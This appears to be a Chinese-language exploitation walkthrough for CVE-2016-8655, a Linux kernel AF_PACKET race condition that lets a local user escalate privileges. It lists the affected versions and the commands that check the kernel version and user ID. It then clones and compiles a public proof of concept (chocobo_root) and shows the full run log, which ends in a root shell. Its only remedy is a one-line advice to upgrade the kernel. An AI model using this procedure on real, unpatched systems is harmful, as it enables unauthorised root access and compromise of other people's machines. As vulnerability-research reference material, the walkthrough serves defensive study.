描述

此漏洞可用于未授权进程中执行内核代码,恶意访问者只需要本地普通权限,就可以利用该漏洞提升到管理员权限。

注:旧内核包含偏移量,但它们未经测试,因此请注意,此漏洞可能会使 4.4 之前的内核崩溃。

影响范围

Linux内核(2011年4月19日发行)开始就受影响了,直到2016年11月30日修复。

( 注:这里并非指从11年到16年所有的Linux内核都会受到影响,敬请依据各系统情况而定)

Linuxkernel version < 4.8.13

利用方式

查看系统内核版本和用户属性

1
2
3
4
5
6
7
8
$ cat /etc/issue
Ubuntu 20.04.3 LTS \n \l

$ uname -a
Linux 6fdeca8326ab 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=1001(test) gid=1001(test) groups=1001(test)

下载poc文件,并编译

poc地址:https://github.com/LakshmiDesai/CVE-2016-8655

1
2
3
$ git clone https://github.com/LakshmiDesai/CVE-2016-8655
$ cd CVE-2016-8655-master
$ gcc chocobo_root.c -o chocobo_root -lpthread

执行poc,并获取高权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
$ ./chocobo_root 
linux AF_PACKET race condition exploit by rebel
kernel version: 4.4.0-51-generic #72
proc_dostring = 0xffffffff81088090
modprobe_path = 0xffffffff81e48f80
register_sysctl_table = 0xffffffff812879a0
set_memory_rw = 0xffffffff8106f320
exploit starting
making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 204517, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 105697, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying.......
vsyscall page altered!


stage 1 completed
registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 125059, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying.......
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@wuala:/opt/CVE-2016-8655-master# id
uid=0(root) gid=0(root) groups=0(root),1001(test)
root@wuala:/opt/CVE-2016-8655-master# whoami
root
root@wuala:/opt/CVE-2016-8655-master#

修复建议

升级到最新版本内核。

⬆︎TOP